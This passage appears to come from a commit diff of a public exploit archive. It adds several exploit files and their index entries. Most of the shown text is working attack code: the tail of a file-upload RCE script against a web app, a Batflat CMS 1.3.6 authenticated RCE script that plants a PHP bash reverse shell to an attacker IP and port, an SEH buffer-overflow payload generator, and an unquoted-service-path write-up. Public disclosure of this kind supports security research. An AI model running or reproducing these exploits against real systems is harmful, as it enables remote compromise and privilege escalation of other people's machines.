YK/jInSjulqsbN1lxx4bT2H928h8H2U8ogXB0RtwTAh7So+6gnzxPZJPP7XTdTWTvnMzd94dZu8/Oz3uWiqML5UYyjBzSoGBg1qLvkdU2f/fMx8/JTvRnu73pX33vk3r7/8Z7o63sZQNv0p4Zpl67hq8U/HvPGzj90l+3eto7wUkIDSeBnfqXuYc2f88JRuq7/Q5W77hwels+MIF8+5Xp3e+iY51v4e5eUTmDT5ktOSob7uf7f5H4IS+o3y2xorAAAAAElFTkSuQmCC"
f = open("tux.png","wb")
f.write(base64.b64decode(imgb64))
f.close()
def main():
s.cookies.clear()
stop_threads = False
check_thread = threading.Thread(target=checkAccess, args =(lambda : stop_threads, ))
check_thread.start()
if typeAttack == "C":
if makeAuth() == -1:
stop_threads = True
check_thread.join()
print("[-] Exiting...")
exit(0)
elif typeAttack == "L":
authByCookie()
else:
"[!] You must specify the type of attack with the -a option"
exit()
createEvilFile()
uploadFile()
updateProfile(pht)
stop_threads = True
check_thread.join()
print("[+] Starting clean up...")
updateProfile()
os.remove("/tmp/evil-tux.png")
print("[+] Exiting...")
if __name__ == '__main__':
main()
s.cookies.clear()
"""try:
main()
s.cookies.clear()
except Exception as e:
print("[\033[91m!\033[0m] Error: %s" % e)"""

View file

@ -5,6 +5,7 @@
# Vendor Homepage: https://www.rukovoditel.net/
# Software Link: https://www.rukovoditel.net/download.php
# Version: v2.6.1
# CVE: CVE-2020-11819
set -e

88
exploits/php/webapps/49573.py Executable file
View file

@ -0,0 +1,88 @@
# Exploit Title: Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)
# Date: 2020-12-27
# Exploit Author: mari0x00
# Vendor Homepage: https://batflat.org/
# Software Link: https://github.com/sruupl/batflat/archive/master.zip
# Description: https://secator.pl/index.php/2021/02/15/batflat-v-1-3-6-authenticated-remote-code-execution-public-disclosure/
# Version: <= 1.3.6
# CVE: CVE-2020-35734
#!/usr/bin/python3
import requests
import sys
import re
from bs4 import BeautifulSoup
from termcolor import colored
from time import sleep
print(colored('''###########################################################''',"red"))
print(colored('''####### Batflat authenticated RCE by mari0x00 #######''',"red"))
print(colored('''###########################################################''',"red"))
print("")
if len(sys.argv) != 6:
print((colored("[~] Usage : python3 batpwnd.py <url> <username> <password> <IP> <PORT>","red")))
print((colored("[~] Default credentials: admin/admin","red")))
print((colored("[~] Example: python3 batpwnd.py http://192.168.101.105/ admin admin 192.168.101.101 4444","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
IP = sys.argv[4]
PORT = sys.argv[5]
#Start session
s = requests.Session()
headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}
#Authenticate
print((colored("[+] Attempting user login","blue")))
login_data = {
"username": username,
"password": password,
"login": "",
}
login = s.post(url+"admin/", login_data, headers=headers)
sleep(0.5)
#Get token
print((colored("[+] Retrieving the token","blue")))
r = s.get(url+"admin/", headers=headers).content
soup = BeautifulSoup(r, "lxml")
token = (re.search(r't=(.*?)">Add', str(soup)).group(1))
print((colored("[+] Token ID: " + token,"blue")))
sleep(0.5)
#Get URL
print((colored("[+] Getting the add-user endpoint URL","blue")))
r = s.get(url+"admin/users/add?t="+token, headers=headers).content
soup = BeautifulSoup(r, "lxml")
add_user_url = (re.search(r'action="(.*?)"', str(soup)).group(1))
sleep(0.5)
#Exploit
print((colored("[+] Adding pwnd user","blue")))
payload = "<?php system(\"/bin/bash -c 'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1'\");?>"
add_user = {
"username": (None, "pwnd"),
"fullname": (None, payload),
"description": (None, "pwnd"),
"email": (None, "pwnd@evil.com"),
"password": (None, "pwnd123"),
"access[]": (None, "users"),
"save": (None, "Save")
}
exploit = s.post(add_user_url, headers=headers, files=add_user)
sleep(0.5)
#Triggering reverse shell
print("")
print((colored("[+] Triggering the shell. Go nuts!","green")))
r = s.get(url+"admin/users/manage?t="+token, headers=headers)

46
exploits/windows/local/48726.py Executable file
View file

@ -0,0 +1,46 @@
# Exploit Title: BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)
# Date: 2020-08-01
# Exploit Author: Saeed reza Zamanian
# Vendor Homepage: http://www.dummysoftware.com
# Software Link: http://www.dummysoftware.com/backlinkspeed.html
# Version: 2.4
# Tested on:
Windows 10.0 x64 Build 10240
Windows 7 x64
Windows Vista x32 SP1
# Replicate Crash:
1) Install and Run the application
2) Run the exploit , the exploit create a text file named payload.txt
3) Press import button and open payload.txt
#!/usr/bin/python
'''
|----------------------------------|
| SEH chain of thread 00000350 |
| Address SE handler |
| 42424242 *** CORRUPT ENTRY *** |
| |
| EIP : 43434343 |
|----------------------------------|
'''
nSEH = "BBBB"
SEH = "CCCC"
payload = "A"*5000+nSEH+"\x90\x90\x90\x90\x90\x90\x90\x90"+SEH
try:
f=open("payload.txt","w")
print("[+] Creating %s bytes payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")
except:
print("File cannot be created.")

View file

@ -0,0 +1,42 @@
# Exploit Title: Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path
# Discovery by: Ismael Nava
# Discovery Date: 02-12-2020
# Vendor Homepage: https://www.microsoft.com
# Software Links : https://www.microsoft.com/en-us/p/xbox-beta/9mv0b5hzvk9z?activetab=pivot:overviewtab
# Tested Version: 2.47.10001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 64 bits
# Step to discover Unquoted Service Path:
C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """
GamingServices GamingServices C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe Auto
GamingServicesNet GamingServicesNet C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe Auto
C:\>sc qc "GamingServicesNet"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: GamingServicesNet
TIPO : 210 WIN32_PACKAGED_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServicesNet
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: NT AUTHORITY\LocalService
C:\>sc qc "GamingServices"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: GamingServices
TIPO : 210 WIN32_PACKAGED_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 0 IGNORE
NOMBRE_RUTA_BINARIO: C:\Program Files\WindowsApps\Microsoft.GamingServices_2.47.10001.0_x64__8wekyb3d8bbwe\GamingServices.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : GamingServices
DEPENDENCIAS : staterepository
NOMBRE_INICIO_SERVICIO: LocalSystem

View file

@ -11204,6 +11204,7 @@ id,file,description,date,author,type,platform,port
48691,exploits/windows/local/48691.py,"Socusoft Photo to Video Converter Professional 8.07 - 'Output Folder' Buffer Overflow (SEH Egghunter)",2020-07-26,MasterVlad,local,windows,
48695,exploits/windows/local/48695.py,"Port Forwarding Wizard 4.8.0 - Buffer Overflow (SEH)",2020-07-26,"Sarang Tumne",local,windows,
48696,exploits/windows/local/48696.py,"Free MP3 CD Ripper 2.8 - Stack Buffer Overflow (SEH + Egghunter)",2020-07-26,"Eduard Palisek",local,windows,
48726,exploits/windows/local/48726.py,"BacklinkSpeed 2.4 - Buffer Overflow PoC (SEH)",2020-08-03,"Saeed reza Zamanian",local,windows,
48735,exploits/windows/local/48735.txt,"CodeMeter 6.60 - 'CodeMeter.exe' Unquoted Service Path",2020-08-06,"Luis Martínez",local,windows,
48740,exploits/windows/local/48740.txt,"BarcodeOCR 19.3.6 - 'BarcodeOCR' Unquoted Service Path",2020-08-10,"Daniel Bertoni",local,windows,
48769,exploits/windows/local/48769.py,"ASX to MP3 converter 3.1.3.7.2010.11.05 - '.wax' Local Buffer Overflow (DEP_ASLR Bypass) (PoC)",2020-08-27,"Paras Bhatia",local,windows,
@ -11233,6 +11234,7 @@ id,file,description,date,author,type,platform,port
49203,exploits/windows/local/49203.txt,"Rumble Mail Server 0.51.3135 - 'rumble_win32.exe' Unquoted Service Path",2020-12-07,"Mohammed Alshehri",local,windows,
49205,exploits/windows/local/49205.txt,"Kite 1.2020.1119.0 - 'KiteService' Unquoted Service Path",2020-12-07,"Ismael Nava",local,windows,
49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
49214,exploits/windows/local/49214.txt,"Microsoft GamingServices 2.47.10001.0 - 'GamingServices' Unquoted Service Path",2020-12-08,"Ismael Nava",local,windows,
49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Tess Sluyter",local,multiple,
49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
@ -11266,6 +11268,7 @@ id,file,description,date,author,type,platform,port
49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquoted Service Path",2021-02-09,"Hector Gerbacio",local,windows,
49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
49563,exploits/android/local/49563.txt,"Tasks 9.7.3 - Insecure Permissions",2021-02-15,"Lyhin\'s Lab",local,android,
49572,exploits/linux/local/49572.txt,"Apport 2.20 - Local Privilege Escalation",2021-02-18,Gr33nh4t,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -43388,6 +43391,7 @@ id,file,description,date,author,type,platform,port
48780,exploits/php/webapps/48780.txt,"Mara CMS 7.5 - Remote Code Execution (Authenticated)",2020-09-01,0blio_,webapps,php,
48781,exploits/php/webapps/48781.txt,"moziloCMS 2.0 - Persistent Cross-Site Scripting (Authenticated)",2020-09-01,"Abdulkadir Kaya",webapps,php,
48783,exploits/php/webapps/48783.txt,"Stock Management System 1.0 - Cross-Site Request Forgery (Change Username)",2020-09-02,boku,webapps,php,
48784,exploits/php/webapps/48784.py,"Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)",2020-09-02,danyx07,webapps,php,
48785,exploits/php/webapps/48785.txt,"Savsoft Quiz Enterprise Version 5.5 - Persistent Cross-Site Scripting",2020-09-03,"Hemant Patidar",webapps,php,
48786,exploits/php/webapps/48786.txt,"BloodX CMS 1.0 - Authentication Bypass",2020-09-03,BKpatron,webapps,php,
48787,exploits/php/webapps/48787.txt,"Daily Tracker System 1.0 - Authentication Bypass",2020-09-03,"Adeeb Shah",webapps,php,
@ -43512,7 +43516,7 @@ id,file,description,date,author,type,platform,port
49235,exploits/jsp/webapps/49235.txt,"Openfire 4.6.0 - 'sql' Stored XSS",2020-12-11,j5s,webapps,jsp,
49236,exploits/php/webapps/49236.txt,"Medical Center Portal Management System 1.0 - Multiple Stored XSS",2020-12-11,"Saeed Bala Ahmed",webapps,php,
49237,exploits/java/webapps/49237.txt,"Jenkins 2.235.3 - 'Description' Stored XSS",2020-12-11,gx1,webapps,java,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE",2020-12-11,coiffeur,webapps,php,
49238,exploits/php/webapps/49238.sh,"Rukovoditel 2.6.1 - RCE (1)",2020-12-11,coiffeur,webapps,php,
49239,exploits/php/webapps/49239.txt,"Supply Chain Management System - Auth Bypass SQL Injection",2020-12-11,"Piyush Malviya",webapps,php,
49240,exploits/php/webapps/49240.py,"Dolibarr 12.0.3 - SQLi to RCE",2020-12-11,coiffeur,webapps,php,
49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
@ -43740,6 +43744,7 @@ id,file,description,date,author,type,platform,port
49534,exploits/php/webapps/49534.txt,"YetiShare File Hosting Script 5.1.0 - 'url' Server-Side Request Forgery",2021-02-08,"numan türle",webapps,php,
49536,exploits/windows/webapps/49536.txt,"Alt-N MDaemon webmail 20.0.0 - 'Contact name' Stored Cross Site Scripting (XSS)",2021-02-08,"Kailash Bohara",webapps,windows,
49537,exploits/windows/webapps/49537.txt,"Alt-N MDaemon webmail 20.0.0 - 'file name' Stored Cross Site Scripting (XSS)",2021-02-08,"Kailash Bohara",webapps,windows,
49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,
49539,exploits/php/webapps/49539.txt,"WordPress Plugin Supsystic Newsletter 1.5.5 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49540,exploits/php/webapps/49540.txt,"WordPress Plugin Supsystic Membership 1.4.7 - 'sidx' SQL injection",2021-02-08,"Erik David Martin",webapps,php,
49542,exploits/php/webapps/49542.txt,"WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
@ -43760,3 +43765,4 @@ id,file,description,date,author,type,platform,port
49565,exploits/php/webapps/49565.txt,"BlackCat CMS 1.3.6 - 'Display name' Cross Site Scripting (XSS)",2021-02-16,"Kamaljeet Kumar",webapps,php,
49569,exploits/php/webapps/49569.txt,"Faulty Evaluation System 1.0 - 'multiple' Stored Cross-Site Scripting",2021-02-17,"Suresh Kumar",webapps,php,
49570,exploits/php/webapps/49570.txt,"Billing Management System 2.0 - 'email' SQL injection Auth Bypass",2021-02-17,"Pintu Solanki",webapps,php,
49573,exploits/php/webapps/49573.py,"Batflat CMS 1.3.6 - Remote Code Execution (Authenticated)",2021-02-18,mari0x00,webapps,php,

Can't render this file because it is too large.